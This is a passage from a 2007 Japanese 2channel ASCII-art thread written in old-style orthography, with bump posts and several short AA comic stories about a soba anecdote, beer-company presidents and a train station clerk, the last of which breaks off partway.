237 :9/9:2007/01/15(月) 20:44:35 ID:INn+MAX20

\ (,,゚Д゚) よし、久しぶりに椎子さんの店に行くか /
─┼─┼─┼ \ キタ━━━━( ´∀`)━━━━!!!!!! /
─┼─┼─┼─┼─┼─╂─┼─┼─┼─┼─┼─┼
─┼─┼─┼─┼─┼─╂─┼─┼─┼─┼─┼─┼
━┷━┷━┷━┷━┷━╋━┷━┷━┷━┷━┷━┷
                ┃
━━━..∧ ∧ ━━━━━┻━━━━━━━━━━━━
 ___( ーДー) zzz./ / / / / / / / / 
(_⊃___ノ⊃⊃ / / / / / / / / / / /
ニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニニ
::::::::::::|!l|:::::::::::::::::::::::::::::|!l:::::::::::::::::::::::::::::|!l:::::::::::::::::::::::::::::|!l:::::::::::::::::

                      〜 ヲハリ 〜

238 :( ´∀`)さん:2007/01/15(月) 20:45:21 ID:INn+MAX20

文字ばかり多い繪々にてお目汚し失禮致しました。

ところで、運營系の板をさまよつてゐて
こんなすれえつどを見つけましたが・・・
http://qb5.2ch.net/test/read.cgi/sec2chd/1168824233/

いやはや、男は敷居を跨げば七人の敵がゐるといふのは眞ですなア。

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ

※上記のすれえつどに登場する ちょろ ★氏が何者かは
こちらを參照のこと。ttp://d.hatena.ne.jp/keyword/FOX%20%A1%FA

239 :( ´∀`)さん:2007/01/15(月) 22:14:53 ID:f4W9uOKu0
つまんね

240 :( ´∀`)さん:2007/01/15(月) 23:06:04 ID:UevrRIYu0
よきかな

241 :( ´∀`)さん:2007/01/16(火) 11:52:25 ID:r8JlkP0Z0
>>229-238
タイムリー・・・もとい時節に適つた題材で乙です。
平成壹玖年貳番局閉鎖騒動の顛末をこのよふに纏めて下さるとは有難きことです。
マタアリとしたヲチも大に好感であります。

242 :保守代はり:2007/01/19(金) 17:45:30 ID:IWIP/Hjh0
今囘の平成壹玖年版閉鎖騷動を良い教訓とする爲、>>224殿のご提案に
御座います樣に、萬一、貳番局が四〇四になつてしまつた場合は、
聯合板で待ち合はせすることにしては如何でせうか。

http://www.bell-tree.com/~chika/cgi-bin/a/index2.html

皆樣の御意見も是非お聞かせ下さいませ。お願ひ致します。

243 :( ´∀`)さん:2007/01/20(土) 01:15:09 ID:lmmwOz1m0
>>242殿
お気に入り登録させて頂きました

244 :( ´∀`)さん:2007/01/21(日) 02:51:19 ID:z8wP5V460
>>242様お疲れ様です。
今後も、貳番局閉鎖の危機はいつなんどき
我々を襲うやも知れぬことであるし、異存は御坐いません。
閉鎖によつて繪繪文化の火が絶やされることの無いやう祈るばかりです。


245 :( ´∀`)さん:2007/01/23(火) 11:31:30 ID:24WU1D6B0
保全

246 :( ´∀`)さん:2007/01/24(水) 23:05:19 ID:9+V4DRwx0
保守であり升

247 :漱石ビキニ:2007/01/26(金) 20:12:41 ID:Wpeh+a+H0
http://news.goo.ne.jp/article/sanspo/entertainment/120070124021.html

248 :( ´∀`)さん:2007/01/28(日) 16:46:06 ID:0KFVeENM0
早めに保全

249 :( ´∀`)さん:2007/01/30(火) 20:46:01 ID:ACc8RaJl0
保全

250 :( ´∀`)さん:2007/01/31(水) 21:01:16 ID:LXO4UfY70
なんか今夜2ちゃんねるのサーバーが落ちるみたいなので、念のため保守。

251 : ◆1IMMMMMMMM :2007/02/01(木) 06:38:46 ID:ATyUT3Xj0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃


252 :( ´∀`)さん:2007/02/03(土) 02:15:51 ID:AsYahYTl0
保全

253 :( ´∀`)さん:2007/02/05(月) 21:44:15 ID:UlGmbiBv0
保全

254 :( ´∀`)さん:2007/02/07(水) 14:40:29 ID:RVpO1Q8T0
すごいAAスレですね。おそれいりました。

255 :( ´∀`)さん:2007/02/08(木) 00:38:44 ID:mi/P5bj50
善き哉
樂しき哉

256 :( ´∀`)さん:2007/02/08(木) 21:08:56 ID:9+gUMMY20
あの閉鎖騒動が、夢のやうだ・・・

257 :( ´∀`)さん:2007/02/09(金) 10:58:50 ID:ZX6EYFWE0
閉鎖を案じながらも食欲旺盛だつた茂名男君はやはり大器?(笑)

258 : ◆1IMMMMMMMM :2007/02/10(土) 02:46:59 ID:csLknpps0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃



259 :( ´∀`)さん:2007/02/12(月) 02:13:42 ID:/Nb5j5ja0
早めに保全

260 : ◆1IMMMMMMMM :2007/02/12(月) 12:58:44 ID:CnYtRHF/0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃



261 :( ´∀`)さん:2007/02/16(金) 15:55:34 ID:0Pcl9QCN0
保全

262 :( ´∀`)さん:2007/02/17(土) 02:36:11 ID:2HbrqG1k0
車やさん急いでおくれ。額縁ショーのあたしの出番まであとはんとき

         . ∧∧___
          (゚ー゚*)==/ノ
 . ∧∧     ./y .ノ//
 (∀・ )     (( / ./
 / y |>  處|// ̄ ̄\
-U---=U======|(==◎ )| ))
   U ~ . 丶─\__/
ヘイ!

263 :( ´∀`)さん:2007/02/19(月) 17:14:37 ID:0O6CujFl0
>>262殿
『額縁ショー』、よく御存知でしたね

264 :( ´∀`)さん:2007/02/20(火) 20:13:56 ID:FdO1NHDF0
(;・∀・) 今でも有るのでせうか

265 :( ´∀`)さん:2007/02/23(金) 00:14:14 ID:S4rjSMTX0
額縁保全

266 : ◆1IMMMMMMMM :2007/02/23(金) 15:54:53 ID:+OqQTE6O0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃




267 :( ´∀`)さん:2007/02/25(日) 20:50:50 ID:6S2GupK9O
擬古トイフハ猫形ノ者ニシテ、ヨロズノ猫ニアラズト云フ。
古人ノ記シ給マフ中ニハ、擬古ハ佳ク人語ヲ解シ、時ニ
「イテーヨシ」「ゴルア」ナドト、シバシバ
人ガ如キ音ヲ発シケル、トゾ有リナム。


保守。

268 :( ´∀`)さん:2007/02/27(火) 02:31:39 ID:rMNIECy90
保全

269 :( ´∀`)さん :2007/02/27(火) 23:27:42 ID:ppgM2HrP0
今更ながら、防衞廳が防衞省となつた今
如何にも海軍省や陸軍省などの旧政廳は復活しないものでありませうか?
この響きは何か懷かしく、またヘイタイさんが身近にゐたころの
古きよき時代(一概にさうとも言へないけどね)を思ひ出させます
どうにかこの省廳が復活しないものでありませうか?

どう見ても駄文ですね、ほんたうに有難う(後略)。

270 :( ´∀`)さん:2007/03/01(木) 00:50:53 ID:EpNvEO3Y0
>>269
個人的には「庁」なんて漢字よりも「廳」といふ漢字を復權せしむべきと存じます

廳、すなはち民の聲を聽いて行政を行ふ。
これぞデモクラシーの本分にも合致して宜しからんと思ひます

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ

271 :( ´∀`)さん:2007/03/02(金) 08:36:15 ID:aECALbdB0
   ∧_∧   
  ( ´∀`)  ふさ先生のご高説に感じ入りました
  < ______y__ > 
  し|__)_)   

272 :( ´∀`)さん:2007/03/03(土) 00:35:19 ID:5aDwJgH10
   ∩ ∩
  ξ゚ё゚ξ  誰か改変コピペして
  ι ιヽ
   ι ι〜


273 : ◆1IMMMMMMMM :2007/03/04(日) 20:32:40 ID:d24XzchB0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃


274 :( ´∀`)さん:2007/03/06(火) 14:38:49 ID:x7T1g0Tf0
保全ばかりで申し訳御座いません

275 :( ´∀`)さん:2007/03/07(水) 17:55:13 ID:xIXSqjGm0
保全作業あつての合紫暑[古すれつどで御座います。
板にすれつどを保たねば、名作の投下も途絶へ住人の悦びも失われませう。
常日頃の御働きに感謝です。

276 :( ´∀`)さん:2007/03/09(金) 02:35:27 ID:bYsUBGhi0
という訳で再び保全

277 :( ´∀`)さん:2007/03/09(金) 21:03:56 ID:7pQhay9I0
世界人民の世界同時革命こそが重要である!
ということで保守。
[,|,,★,,,|,]
ミ・∀・ 彡y━~~


278 :( ´∀`)さん:2007/03/10(土) 01:12:09 ID:nH6RzqlC0
    |┃三     , -.―――--.、
    |┃三    ,イ,,i、リ,,リ,,ノノ,,;;;;;;;;ヽ
    |┃    .i;}'       "ミ;;;;:}
    |┃    |} ,,..、_、  , _,,,..、  |;;;:|
    |┃ ≡  |} ,_tュ,〈  ヒ''tュ_  i;;;;|
    |┃    |  ー' | ` -     ト'{
    |┃   .「|   イ_i _ >、     }〉}     _________
    |┃三  `{| _;;iill|||;|||llii;;,>、 .!-'  />>277
    |┃     |    ='"     |    < 情緒溢れる擬古先生のスレに突然革命を叫ぶは無粋の極み。
    |┃      i゙ 、_  ゙,,,  ,, ' {     \ よって、ラーゲリ逝き決定。
    |┃    丿\  ̄ ̄  _,,-"ヽ      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |┃ ≡'"〜ヽ  \、_;;,..-" _ ,i`ー-    
    |┃     ヽ、oヽ/ \  /o/  |

279 :( ´∀`)さん:2007/03/12(月) 17:33:32 ID:0XcFZ6ET0
はや三月も半ばにならんとしてをりますが
まだ火鉢を仕舞ふのは早いでせうかねヱ?   |
___  _________________/
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 | 暖かくなったやうでも寒の戻りがあるからな・・・微妙なところだ

280 :( ´∀`)さん:2007/03/12(月) 17:33:58 ID:o+0Ta1wj0
保全

281 :280:2007/03/12(月) 17:36:16 ID:o+0Ta1wj0
無駄な保全を行なつてしまひました。本當に申し譯御座いません

282 :( ´∀`)さん:2007/03/13(火) 19:19:47 ID:q/zR3VXU0
何を仰います
弐拾陸秒差ではありませんか
毎度の保全作業ありがたうございます

283 :( ´∀`)さん:2007/03/13(火) 21:11:33 ID:08t6hKHl0
一/十


   茂名男、久しぶりぢやないか
  ――――――――v――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
―――ゝ―――――――――――――――――
ちよつと近くまで來たものですからご挨拶にでもと

284 :( ´∀`)さん:2007/03/13(火) 21:12:37 ID:08t6hKHl0
二/十


ちやうど今から蕎麥をゆでるところだからお前も食べていきなさい
――――――――――v――――――――――――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
――――ゝ――――――――――――――――――
ええ、そんな…お晝時を狙つたやうで…はぁ…
その、いやあ、いゝんですか?ぢやあ、頂いていきます

285 :( ´∀`)さん:2007/03/13(火) 21:13:21 ID:08t6hKHl0
三/十


蕎麥と言へばちよつと面白い話がありまして
___  ______________
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
               ̄ ̄   ̄ ̄ ̄
               はう、なんだ

286 :( ´∀`)さん:2007/03/13(火) 21:14:21 ID:08t6hKHl0
四/十


毎年大晦日には祖母の家に行くのですが、そこでうまい蕎麥がでゝきまして


ばあちやん、この蕎麥はうまいね。どこの蕎麥?
___  ________________
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (´ー`)       ┃〇──‐
  < ______y__ > ┌──┐  ( y  )       ┃###
  し|__)_)  (::::::::::::::::) (    )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
        ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      さうかい、さうかい。
      これは兄さんが打つて送つてきてくれたんだよ

287 :( ´∀`)さん:2007/03/13(火) 21:15:02 ID:08t6hKHl0
五/十


あの人も戰爭中は南で銃撃つて、引き上げてきたと思つたら今度は
蕎麥打つて、本當にうつのが好きな人だねえ。アッハッハー
____________  ________________
                  ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  (;´∀`)      ||   (´ー`)       ┃〇──‐
  < ______y__ > ┌──┐  ( y  )       ┃###
  し|__)_)  (::::::::::::::::) (    )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧
  ̄ ̄ ̄   ̄ ̄ ̄
 ばあちやん…

288 :( ´∀`)さん:2007/03/13(火) 21:15:49 ID:08t6hKHl0
六/十


          隨分面白いお祖母さんだな
         ______  ______
                  ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ∧
  ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 えゝ、本當に元氣で。
 それで、この話にはまだ續きがありまして

289 :( ´∀`)さん:2007/03/13(火) 21:16:47 ID:08t6hKHl0
七/十


去年行つた時にその蕎麥がなかつたので聞いてみたんですが…


     今年はねぇ、ないんだよ。なんでも義姉さんに…
      ________  __________
                  ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (´ー`)       ┃〇──‐
  < ______y__ > ┌──┐  ( y  )       ┃###
  し|__)_)  (::::::::::::::::) (    )     ┃#
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

290 :( ´∀`)さん:2007/03/13(火) 21:18:33 ID:08t6hKHl0
八/十


    ∩_∩   /ノ人ヽ ||
   ( ;´∀`)   (゜д゜#)||о__
   <   y > ┳(/  | ||###
    ( /つ )  ||(  )⊃ ||###
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
________∧___________________
あんたは打つだけならまだしも先方の都合も考へないで送りつけて!
ちよつとは迷惑を考へたらどうなのさ!

291 :( ´∀`)さん:2007/03/13(火) 21:20:32 ID:08t6hKHl0
           なんて怒られたらしくてねえ
            ____  _______
                  ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  (;´∀`)      ||   (´ー`)       ┃〇──‐
  < ______y__ > ┌──┐  ( y  )       ┃###
  し|__)_)  (::::::::::::::::) (    )     ┃#
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


292 :( ´∀`)さん:2007/03/13(火) 21:21:46 ID:08t6hKHl0
九/十


で、去年は食べられませんでした
___  __________
     ∨
                          ┃
   ∧_∧      。   ∧ ∧        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
        ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ははは、隨分と恐妻家なんだな。
       俺だつたらうるせえと一言言つてやるがね

293 :( ´∀`)さん:2007/03/13(火) 21:22:54 ID:08t6hKHl0
十/十


                あら、なんと仰るんですか?
               ______  ______
                        ∨
                      /ノ人ヽ┃
   ∧_∧      。   ∧ ∧  (゚ー゚*) ┃
  ( ´∀`)      ||   (゚Д゚;)  ~旦y,~)┃〇──‐
  < ______y__ > ┌──┐ < y  > |,,,,,,||>.┃###
  し|__)_)  (::::::::::::::::) ( /つ ) .|  ノゞ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 ∧
           ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄
           ひ、一言「うまい!」とだな…

294 :( ´∀`)さん:2007/03/13(火) 22:27:43 ID:kVe7lFxu0
   ∧∧
  (,,゜Д゜) GJ!
  / っ=#
 ( つ肖
    __
  /戔淺7|
  | ̄ ̄|,/

295 :( ´∀`)さん:2007/03/14(水) 00:39:24 ID:eEAezA/+0
個人認證番號 08t6hKHl0 殿
乙で御座います。愛妻家の擬古先生らしく、面白可笑しい秀作ですな。

296 :( ´∀`)さん:2007/03/14(水) 08:47:48 ID:U8bYOLjf0
>>283-293
良き御仕事 ヽ(・∀・)ノワンダホー!
>>294様の絵絵と合わせて、なんだか蕎麦が食べたくなつてしまひました(笑)

297 :( ´∀`)さん:2007/03/14(水) 17:37:20 ID:XGvcFxEQ0
蕎麥に引き續いて小話をば…


一/四



先生、面白い冗談があるんですよ
―――ヽ―――――――――――
       息拔きには良いかもしれんな、言つてくれ
      ――――――y――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄


298 :( ´∀`)さん:2007/03/14(水) 17:37:59 ID:XGvcFxEQ0
二/四


麥酒會社の社長が連れ立つてバァに酒を飮みに行く事になつた


    麒麟     ヲリオン   ヱビス
    ∧,,∧     ∧_∧    ∧∧
   ミ,,゚Д゚彡   ( ´∀`)   (,,゚Д゚)
   (ミ   ミ)   (    )  ⊂  ⊃
    ミ   ミ    | |  |   〜|  |
    ∪ ∪    (__)_)   U"U

「我々は麥酒會社の社長だ、やはり酒といつたら麥酒だらう」


299 :( ´∀`)さん:2007/03/14(水) 17:38:32 ID:XGvcFxEQ0
三/四


麥酒と言つたらヲリオンだ
日本一の麥酒、ヲリオンをくれ
―――ヽ――――――――――
   いや/\、麒麟に決まつてゐます
   麥酒の王樣、麒麟を下さい
  ―――――y――――――――――

日 ▽ U日 ▽ U [] V
≡≡≡≡≡≡≡≡≡≡≡  ∧ ∧
 V ∩  V ∩ [] 目  (゚ω゚=)
__ ∧∧ __∧,,∧ __. ∧∧|つ∽__.
  (   )  .ミ   ,,ミ   (   ,,)
― /   つ― ミ   ミ――./   | ――――
O(__.ノ 〜ミ,,,,,,,,,ミ  \(__.ノ
 ━┳━  ━┳━   ━┳━
 ̄ ┻  ̄ ̄ ┻  ̄ ̄ ̄┻ ̄ ̄ ̄ ̄ ̄ ̄
     ―――――――ゝ――――――
     ぢやあ俺はウヰスキーでいゝや

300 :( ´∀`)さん:2007/03/14(水) 17:39:23 ID:XGvcFxEQ0
四/四


 ヱビスさんは何だつてヱビスを飮まないんだ?
―――y――――y――――――――――――

日 ▽ U日 ▽ U [] V
≡≡≡≡≡≡≡≡≡≡≡  ∧ ∧
 V ∩  V ∩ [] 目  (゚ω゚=)
__ ∧∧ __∧,,∧ __. ∧∧|つ∽__.
  ( ´∀)  .ミ,,゚Дミ   (Д゚,,)
― /   つ― ミ   ミ――./   | ――――
O(__.ノ 〜ミ,,,,,,,,,ミ  \(__.ノ
 ━┳━  ━┳━   ━┳━
 ̄ ┻  ̄ ̄ ┻  ̄ ̄ ̄┻ ̄ ̄ ̄ ̄ ̄ ̄
 ――――――――――ゝ――――――――
 何でつて…あんたらが麥酒を飮まないんなら
 俺も飮まないよ

                         終劇

元ねたではコロナ、バドワイザー、ギネスでしたがこの時代は馴染みがないだらうと改變致しました

301 :( ´∀`)さん:2007/03/14(水) 21:21:40 ID:U8bYOLjf0
(;・∀・)詰まり、「ヱビスに非ずんば麥酒に非ず」、と。。。w
麥酒会社の社長の癖にバアでウヰスキイを注文したヱビス社長氏が
実は一等尊大な構へであつたといふオチですな。
乙でしたww


302 :( ´∀`)さん:2007/03/15(木) 01:51:39 ID:V/RJgdeC0
オチも秀逸。改變もお見事。實に素晴らしい!!

303 :( ´∀`)さん:2007/03/15(木) 02:37:10 ID:i0fZCrkx0
   ∩ ∩
  ξ゚ё゚ξ  誰か改変コピペして
  ι ιヽ
   ι ι〜



304 :( ´∀`)さん:2007/03/15(木) 02:50:44 ID:i0fZCrkx0
>>293
実に面白い。

305 :( ´∀`)さん:2007/03/15(木) 13:23:51 ID:xDsBB+J90
一/五


子供向けの冒險活劇をお書きになるらしいですね
―――ヽ―――――――――――――――――
     うむ、いろ/\な事が自分の爲にもなると思つてな
    ―――――――y――――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ―――――――ヽ――――――――――――
     去年、怪人デッキブラシ(※)と言ふのを聞いてな
     それを題材にしたのだ


※ 怪人デッキブラシ
  @@ 明 治 大 正 昭 和 擬 古 (其の拾) ## 37〜をご參照ください

306 :( ´∀`)さん:2007/03/15(木) 13:24:27 ID:xDsBB+J90
二/五


怪人デッキブラシはその名の通りブラシで至る所を擦りまはるのだ

                       (
              | : : : |┛    (          ∧,,∧  ぎゃあ                
            ┗| : : : |      (    ┌     ミ・∀・,,ミ ふさたんの自転車がぴかぴか 
              | : : : |      (  ◎└−◎  ミuu_@                      
              |.__ |      (                              
              ||帝| |      〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
              ||國| |                      )
____________||債| |____________     )
l__|,|,|,|,|,|,|,|,|,|__l_,,||權| |__l__|,|,|,|,|,|,|,|,|,|__l_     )
_l_|,|,|,|,|,|,|,|,|,|__l__|  ̄ .|_l__l__,|,|,|,|,|,|,|,|,|,|_l__l      )
l__l__l__l__l_| : : : |__l__l__l__l__l_     )
_l__l__l__l__,| : : : |_l__l__l__l__l__     )
l__l__l__l__l_| : : : |__l__l__l__l__l_     )
              l.,___,.;|                       )
   __| ̄|__                                )
   (,,゚Д゚)                                 )
   ⊂ y⊃                                )
  〜|  |                                 )
    し`J                                 )
―――ヽ―――――――――――――               )
塵の一つも落ちてゐないとは素晴らしい                )
                                       )
〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜


307 :( ´∀`)さん:2007/03/15(木) 13:25:08 ID:xDsBB+J90
三/五


       まあ、こんな具合だ
      ――――ヽ―――――
でも綺麗になるなら問題はないんぢやないですか?
――――y―――――――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ―――――――ヽ――――――――――――
     目的も判らず正體も掴めず、謎ぢやあないか
     だからこそ怪人だよ


308 :( ´∀`)さん:2007/03/15(木) 13:25:40 ID:xDsBB+J90
四/五


   プッ          | |            |
  ∧_∧    ∧_∧ |―― ∧∧─―〇|
 ( ´_ゝ`)   ( ´∀`) |   (゚Д゚,,)    |
 (o.{胤} ) _< ! y   >|    ( /つl⌒l⌒l |
 ■| | | _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 ( ̄.) ̄) |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄

309 :( ´∀`)さん:2007/03/15(木) 13:26:15 ID:xDsBB+J90
五/五


いきなり「寢る!」とか言ひ出してしまつて…
―――――――――y―――――――――
       
    ∧_∧     /ノ人ヽ
   (; ´∀`)     (゚ー゚;). 
__< ! y   >     (/  |  
 _∧_/~~ ~ノJ   (  )⊃
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    。
     o
―――○―――――――――――
やつぱり先生は打たれ弱いなァ…

                        終劇

310 :( ´∀`)さん:2007/03/16(金) 02:34:38 ID:xz35pLq20
>>305-309
をを、連日のやうに秀作の投下とは嬉しひ限りです(^^)
実に乙で御座います。
浮雲氏久々の登場にてたつた一言(?)で擬古先生を撃沈とは
イヤハヤ恐れ入りましたw

311 :( ´∀`)さん:2007/03/16(金) 12:06:44 ID:Mi7FjwLg0
一/七


今日はまたちよつと良い話があるんですよ
――――v―――――――――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ――――ゝ―――――
         はうはう、どんなのだ?
――――ゝ――――――――――――
驛員の友人から聞いた話なんですがね

312 :( ´∀`)さん:2007/03/16(金) 12:08:57 ID:Mi7FjwLg0
二/七


    ii~⌒⌒⌒∧_∧⌒⌒i
    --、_______(  ・- ・)___--
   i \\______| U U______\ \
   \ ) )______) ) )________) )
   ___  |\ ̄ ̄ ̄ ̄ ̄ ̄\ 
   \      | | .\________\ ∧_∧
     \        | |----------| |(∀・  )
      \__ _i.i⌒⌒⌒⌒⌒li⌒⌒⌒⌒⌒i
              ( \i.i       .|i       .i
             ヽ  i          |i          |
             \|_______||_______|
   ____
   ヽ===ソ
   (,,゚Д゚)。oO(應接ソファにお客さんか…
   |⊃|    確りしてゐるし年配で背廣だし、本社の人かな)
  〜|  0
   し'´

313 :( ´∀`)さん:2007/03/16(金) 12:09:41 ID:Mi7FjwLg0
三/七


〜勤務後〜


               改札終はりました〜…あれ?本社の方は
               もう歸られたんですか?
               ―――――――――――――ヽ――――
                                 ____
                                 ヽ===ソ
   _____________________________________        (゚Д゚,∩
       \  ヽ ==@/\      \ ≡\      (| .y ,ノ
   ̄ ̄ ̄ ̄ \ ( ・∀) ̄\ ̄ ̄ ̄ ̄\ ヽ_\      |  |〜
   二二二二二|| | ̄ ̄|二 ニ||ニ| ̄ ̄|ニ|ニニコ     .し`J
            || |──|   || |──| |   |
      ――――ゝ―――――――――――
       今日は本社の人なんて來てないよ?
          ―――――――――――――――――ヽ――――――
           え…あの應接ソファで助役(※)さんと話してゐた人は?

 ※助役…驛における管理職

314 :( ´∀`)さん:2007/03/16(金) 12:10:29 ID:Mi7FjwLg0
四/七


あゝ、あの人は職員の臨時募集に應募してきた人
―――――――ヽ――――――――――――――                          
   _____________________________________   
       \  ヽ ==@/\      \ ≡\  
   ̄ ̄ ̄ ̄ \ ( ・∀) ̄\ ̄ ̄ ̄ ̄\ ヽ_\     ∧∧
   二二二二二|| | ̄ ̄|二 ニ||ニ| ̄ ̄|ニ|ニニコ  Σ(゚Д゚,,)
            || |──|   || |──| |   |   ⊂. y ⊃
                                .|  |〜
                                 し`J
            ―――――――――――――――ヽ――――
             えつ!隨分ちやんとしてゐたから本社の人かと
             思つちやゐましたよ

315 :( ´∀`)さん:2007/03/16(金) 12:11:14 ID:Mi7FjwLg0
五/七


私は年齡もあり陸軍を除隊致しましたが働かなければ
人間駄目になつてしまふと思ひ、志望致しました
―――――――ヽ―――――――――――――――
    ii~⌒⌒⌒∧_∧⌒⌒i
    --、_______(  ・- ・)___--
   i \\______| U U______\ \
   \ ) )______) ) )________) )
   ___  |\ ̄ ̄ ̄ ̄ ̄ ̄\ __
   \      | | .\________\ ∧_∧
     \        | |----------| |(∀・  ) ホウホウ
      \__ _i.i⌒⌒⌒⌒⌒li⌒⌒⌒⌒⌒i
              ( \i.i       .|i       .i
             ヽ  i          |i          |
             \|_______||_______|

   ヽ ==@/  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ( ・∀)<と、言ふ事らしいよ
         \_______

316 :( ´∀`)さん:2007/03/16(金) 12:11:55 ID:Mi7FjwLg0
六/七


曹長さんやつて、除隊したのにまだ活力があるつて
言ふのはいゝね。あゝ言ふ風に年をとりたいものだ
―――――――ヽ――――――――――――――                          
   _____________________________________   
       \  ヽ ==@/\      \ ≡\  
   ̄ ̄ ̄ ̄ \ ( ・∀) ̄\ ̄ ̄ ̄ ̄\ ヽ_\     ∧∧
   二二二二二|| | ̄ ̄|二 ニ||ニ| ̄ ̄|ニ|ニニコ    (゚Д゚,,)
            || |──|   || |──| |   |   ⊂. y ⊃
